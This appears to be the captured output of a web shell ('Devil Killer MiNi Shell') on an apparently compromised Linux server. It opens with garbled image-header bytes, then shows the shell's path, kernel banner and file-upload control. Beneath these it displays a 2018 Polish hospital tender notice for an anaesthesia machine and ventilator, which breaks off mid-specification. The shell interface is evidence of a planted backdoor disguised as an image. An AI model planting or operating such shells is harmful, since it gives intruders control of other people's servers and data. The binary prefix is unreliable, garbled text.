JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180710/585752-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 585752-N-2018 z dnia 2018-07-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Szpital Miejski w Siemianowicach Śląskich Spółka z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa sprzętu medycznego - aparatu do znieczulania i respiratora</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Szpital Miejski w Siemianowicach Śląskich Spółka z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">30827000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">1-go Maja</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">9</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">41-100 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Siemianowice Śląskie</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">32 228 30 30, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zp@zozsiemianowice.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">32 228 14 98</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.zozsiemianowice.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">www.zozsiemianowice.pl</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.zozsiemianowice.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.zozsiemianowice.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Kurierem lub operatorem pocztowym.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Szpital Miejski w Siemianowicach Śl. Sp. z o.o.; ul. 1-go Maja 9, 41-100 Siemianowice Śl., sekretariat (pok. A002),</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa sprzętu medycznego - aparatu do znieczulania i respiratora</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">SZM/DN/DZ/341/20/2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest dostawa sprzętu medycznego: aparatu do znieczulenia i respiratora.Pakiet nr 1 - Aparat do znieczulania - o parametrach opisanych w załączniku nr 1 do SIWZPakiet nr 2 - Respirator - o parametrach opisanych w załączniku nr 1 do SIWZAPARAT DO ZNIECZULANIAPARAMETRY OGÓLNE1. Zasilanie elektryczne 230 V / 50 Hz	TAK 2. Aparat na podstawie jezdnej, TAK 3. Hamulec centralny	TAK 4. Trzy szuflady na akcesoria	TAK 5. Jedna z szuflad zamykana na klucz/zamek szyfrowy, podać	TAK/NIE Tak - 1 pktNie - 0 pkt6. Blat do pisania, wbudowane oświetlenie, płynna regulacja natężenia światła	TAK 7. Uchwyty fabryczne do 10L butli tlenowej i podtlenku azotu, butle ustawiane z tyłu aparatu (bez butli)	TAK 8. Dodatkowe gniazda elektryczne 230 V z tyłu aparatu (minimum 3) podać	TAK 9. Zasilanie gazami: N2O, O2, Powietrze, z sieci centralnej, w zestawie węże wysokociśnieniowe o długości 5 m	TAK 10. Awaryjne zasilanie elektryczne całego systemu na minimum 45 minut w każdych warunkach, (akumulator/bateria wbudowane, nie dopuszcza się zewnętrznych źródeł zasilania) podać	TAK 11. Awaryjne zasilanie elektryczne całego systemu w typowych warunkach powyżej 100 minut, (akumulator/bateria wbudowane, nie dopuszcza się zewnętrznych źródeł zasilania), podać	TAK/NIE Tak - 1 pktNie - 0 pkt12. Reduktory do butli O2 i N2O, nakręcane (połączenie gwintowe), wyposażone w przyłącza do aparatu	TAK 13. Ssak inżektorowy napędzany powietrzem lub tlenem z sieci centralnej, zasilanie ssaka z przyłączy w aparacie, regulacja siły ssania, zbiornik na wydzielinę, zbiornik zapasowy, dwa zbiorniki na wydzielinę o łącznej objętości minimum 1200 ml.	TAK 14. W dostawie jednorazowe wkłady na wydzielinę - 25 szt., jednorazowe dreny do odsysania - 25 szt.	TAK SYSTEM DYSTRYBUCJI GAZÓW15. Precyzyjne, elektroniczne przepływomierze dla O2, N2O, Powietrza, możliwa precyzyjna prezentacja przepływu ze skokiem 10 ml/min	TAK 16. Mechaniczny sumaryczny przepływomierz świeżych gazów	Tak 17. System automatycznego utrzymywania minimalnego stężenia tlenu w mieszaninie oddechowej z N2O, na poziomie, co najmniej 23%, podać	TAK UKŁAD ODDECHOWY18. System oddechowy, okrężny, do wentylacji dorosłych i dzieci	TAK 19. Elementy systemu oddechowego mające styczność z mieszaniną oddechową pacjenta, w tym czujniki przepływu, nadają się do sterylizacji parowej (nie dotyczy jednorazowych układów rur, linii próbkujących)	TAK 20. Jeden dodatkowy/zapasowy czujnik przepływu	TAK 21. W komplecie jednorazowe układy oddechowe z workiem (długość rur do pacjenta, co najmniej 170 cm, objętość bezlateksowego worka do wentylacji ręcznej 2.0L) - 25 szt.	TAK 22. System oddechowy na ramieniu obrotowym ułatwiającym odpowiednie ustawienie	TAK 23. Obejście tlenowe, podać wydajność	TAK 24. Regulowany zawór ograniczający ciśnienie w trybie wentylacji ręcznej (APL)	TAK 25. Zawór APL z funkcją natychmiastowego zwolnienia ciśnienia w układzie bez konieczności skręcania do minimum, opisać	TAK 26. Pochłaniacz dwutlenku węgla, jednorazowego użytku, objętość min 1100 ml, podłączony do aparatu	TAK 27. W dostawie, w sumie, 6 jednorazowych zbiorników z wapnem sodowanym	TAK 28. Ewakuacja bierna zużytych gazów, w dostawie rura do ewakuacji (jeden mankiet ze specjalnymi otworami) o długości 5 m i wtyk do gniazda odciągu typu DIN	Tak RESPIRATOR ANESTETYCZNY29. Respirator anestetyczny wbudowany	TAK 30. Wentylacja pacjentów ze wszystkich grup wiekowych nie wymaga użycia odmiennych elementów systemu oddechowego i czujników z wyłączeniem rur oddechowych i worka do wentylacji ręcznej	TAK 31. Respirator napędzany elektrycznie lub pneumatycznie, podać	TAK 32. Respirator ekonomiczny, nie zużywający gazów do napędu, TAK/NIE Tak - 3 pktNie - 0 pkt33. Kolorowy ekran LCD, przekątna minimum 6 cali, podać	TAK 34. Ekran respiratora wbudowany w ścianę przednią aparatu	TAK/NIE Tak - 1 pktNie - 0 pkt35. Obsługa respiratora za pomocą pokrętła funkcyjnego i/lub przycisków wyboru	TAK TRYBY WENTYLACJI36. Tryb ręczny	TAK 37. Oddech spontaniczny	TAK 38. Wentylacja kontrolowana objętościowo (VCV)	TAK 39. Wentylacja synchronizowana kontrolowana objętościowo (SIMV)	TAK 40. Wentylacja synchronizowana kontrolowana objętościowo ze wspomaganiem ciśnieniowym (SIMV/PS)	TAK 41. Możliwość rozbudowy w przyszłości o wentylację wspomaganą ciśnieniowo z zabezpieczeniem na wypadek bezdechu (PSV)	TAK/NIE Tak - 1 pktNie - 0 pkt42. Wentylacja kontrolowana ciśnieniowo (typu PCV)	TAK 43. Awaryjny tryb wentylacji - możliwa wentylacja ręczna po zaniku napięcia zasilającego i rozładowaniu się akumulatora, opisać	TAK 44. Awaryjny tryb wentylacji - możliwa wentylacja mechaniczna przy braku dopływu świeżych gazów medycznych (z sieci centralnej, z butli), opisać	TAK/NIE Tak - 2 pktNie - 0 pktREGULACJE45. Regulacja stosunku wdechu do wydechu, podać zakres	TAK 46. Możliwe odwrócenia stosunku wdechu do wydechu powyżej 3:1	TAK/NIE Tak - 2 pktNie - 0 pkt47. Regulacja częstości oddechów minimum od 4 do 60 odd/min, podać zakres	TAK 48. Regulacja objętości oddechowej minimum od 20 do 1200 ml, podać zakres	TAK 49. Regulacja PEEP - dodatnie ciśnienie końcowo wydechowe, w zakresie minimum od 4 do 20 cmH2O (hPa), podać zakres	TAK 50. Możliwa regulacja PEEP od 0 cmH2O (hPa)	TAK/NIE Tak - 2 pktNie - 0 pkt51. Regulacja ciśnienia wdechowego przy PCV w zakresie minimum od 10 do 60 cmH2O (hPa), podać zakres	TAK 52. Regulacja Plateau w zakresie minimum od 20% do 50% TAK 53. Regulacja Plateau od 0%	TAK/NIE Tak - 2 pkt Nie - 0 pktALARMY54. Niskiej i wysokiej objętości minutowej lub niskiej i wysokiej objętości oddechowej	TAK 55. Alarm minimalnego i maksymalnego ciśnienia wdechowego	TAK 56. Alarm braku zasilania w energię elektryczna	TAK 57. Alarm braku dopływu lub spadku ciśnienia tlenu	TAK 58. Alarm Apnea	TAK PREZENTACJA WARTOŚCI LICZBOWEJ59. Objętości oddechu Vt	TAK 60. Objętości minutowej MV	TAK 61. Częstotliwości oddechowej f	TAK 62. Ciśnienia szczytowego	TAK 63. Ciśnienia średniego	TAK 64. Ciśnienia plateau	TAK 65. Ciśnienia PEEP	TAK INNE66. Szyna parowników z jednym lub dwoma lub trzema aktywnymi miejscami do jednoczesnego zawieszenia dwóch lub trzech parowników, przynajmniej jedno miejsce z mocowaniem typu Dräger TAK 67. Dodatkowy, niezależny, zintegrowany przepływomierz do podaży O2 przez maskę lub kaniulę	TAK 68. Dodatkowa lampka halogenowa lub LED, na elastycznym ramieniu, zamocowana przy aparacie.	TAK KARDIOMONITOR DO APARATU DO ZNIECZULANIAWYMAGANIA OGÓLNE69. Monitor pacjenta umożliwia podłączenie do klinicznych systemów informatycznych (CIS) zbierających parametry życiowe pacjenta, w celu umożliwienia prowadzenia dokumentacji medycznej (karty znieczulenia) w formie elektronicznej. Dostępny system informatyczny typu CIS producenta oferowanego kardiomonitora, w języku polskim - podać nazwę.	TAK 70. Pojedynczy monitor pacjenta, stacjonarno-transportowy, umożliwia monitorowanie parametrów życiowych oraz ich wyświetlanie przy łóżku pacjenta oraz w trakcie transportu, zgodnie z opisem w dalszej części specyfikacji.	TAK 71. Monitor pacjenta modułowy. Dotyczy sprzętu i oprogramowania. Poszczególne moduły pomiarowe przenoszone między monitorami i podłączane bez udziału serwisu.	TAK 72. Moduły pomiarowe jedno i/lub wieloparametrowe, przenoszone pomiędzy stanowiskami. Podłączenie modułu zapewnia automatyczne rozpoczęcie pomiaru i zmianę konfiguracji ekranu.	TAK 73. Cały system chłodzony konwekcyjnie, bez użycia wentylatorów	TAK 74. Monitor posiada tryb ,,standby" umożliwiający wprowadzenie monitora w stan uśpienia - wyciszenie alarmów przy odłączeniu pacjenta od monitora, bez utraty danych osobowych pacjenta ani spersonalizowanych funkcji / poziomów alarmów	TAK 75. Monitor posiada tryb prywatności umożliwiający nieprzerwane monitorowanie parametrów życiowych pacjenta i funkcjonowanie alarmów, bez wyświetlania ich na ekranie monitora stacjonarnego i modułu transportowego	TAK 76. Monitor umożliwia pełną konfigurację jego opcji/funkcji w trakcie pracy, bez konieczności przerywania monitorowania pacjenta	TAK 77. Możliwość podłączenia ekranu kopiującego	TAK RESPIRATOR - 1 sztukaLp.	Opis parametrów wymaganych1	Respirator do długotrwałej terapii niewydolności oddechowej różnego pochodzenia dla dorosłych2	Awaryjne zasilanie z wewnętrznego akumulatora do podtrzymania pracy aparatu (nie tylko alarmów) na minimum 45 minut; zasilanie AC 230 V /50 Hz +/- 10%3	Respirator na podstawie jezdnej, min dwa kółka wyposażone w blokadę.4	Wentylacja kontrolowana objętością VCV5 Wentylacja kontrolowana ciśnieniem PCV6	Wentylacja ciśnieniowo kontrolowana z docelową objętością oddechową typu PRVC, AutoFlow, VG7	CMV/ Assist8	SIMV9	PS10	PEEP/CPAP 11	Możliwość rozbudowy o tryb wentylacji z zagwarantowaną objętością minutową12	Wdech manualny.13	Oddech spontaniczny14	Westchnienia automatyczne z regulacją parametrów15	Wentylacja spontaniczna na dwóch poziomach ciśnienia: BIPAP lub Bilevel lub SPAP16	Możliwość rozbudowy o wentylację typu APRV17	Częstość oddechów minimalny zakres 5-80 odd./min18	Objętość pojedynczego oddechu minimalny zakres 50- 2000 ml19	Czas wdechu minimalny zakres 0,2 - 4 s20	Stężenie tlenu w mieszaninie oddechowej regulowane płynnie w zakresie 21 - 100%21	Ciśnienie wdechowe PCV minimalny zakres 2 - 80 cmH2O22	Ciśnienie wspomagania PSV minimalny zakres 0 - 50 cmH2O23	PEEP/CPAP minimalny zakres 0 - 40 cmH2O24	Przepływowy tryb rozpoznawania oddechu własnego pacjenta minimalny zakres 1 - 10 l/min25	Regulowane procentowe kryteriumzakończenia fazy wdechowej w trybiePSV minimalny zakres 10 - 70 [%]26	Wbudowany kolorowy, dotykowy monitor obrazowania parametrów wentylacji, przekątna minimum 12 cali27	ATC - automatyczna kompensacja oporów rurki intubacyjnej - możliwość stosowania rurek z wewnętrzną średnicą do min. 12 mm28	Integralny pomiar stężenia tlenu 29	Możliwość rozwinięcia w przyszłości o tryb APRV30	Całkowita częstość oddychania31	Częstość oddechów spontanicznych32	Objętość pojedynczego oddechu33	Pomiar wielkości objętości przecieku w układzie pacjenta34	Ciśnienie szczytowe35	Średnie ciśnienie w układzie oddechowym36	Stosunek wdech/wydech I:E37	Ciśnienie PEEP/CPAP38	Ciśnienie plateau39	Pomiar oporności 40	Pomiar podatności 41	Możliwość rozwinięcia w przyszłości o dodatkową podstawę jezdną do butli O2 dokowaną do podstawy jezdnej respiratora - przedstawić zdjęcie proponowanego rozwiązania42	Prezentacja trendów z ostatnich 10 dni (dotyczy trendy wartości mierzonych i parametrów ustawianych przez operatora)43	Wyposażenie dodatkowe: 50 szt. układówoddechowych jednorazowych dł. min. 180cm , 10 szt. zastawek wydechowych jednorazowych, 1szt. zastawka wydechowa wielorazowa dodezynfekcji i sterylizacji, 5 szt. czujników przepływu do dezynfekcji, płuco testowe wielokrotnego użytku, 44	Respirator wyposażony w szyny boczne dozamontowania innych akcesoriówALARMY45	Braku zasilania w energię elektryczną46	Całkowitej objętości minutowej (wysokiej i niskiej)47	Niskiej objętości oddechowej pojedynczego oddechu48	Wysokiego ciśnienia w układzie pacjenta49	Niskiego ciśnienia w układzie pacjenta50	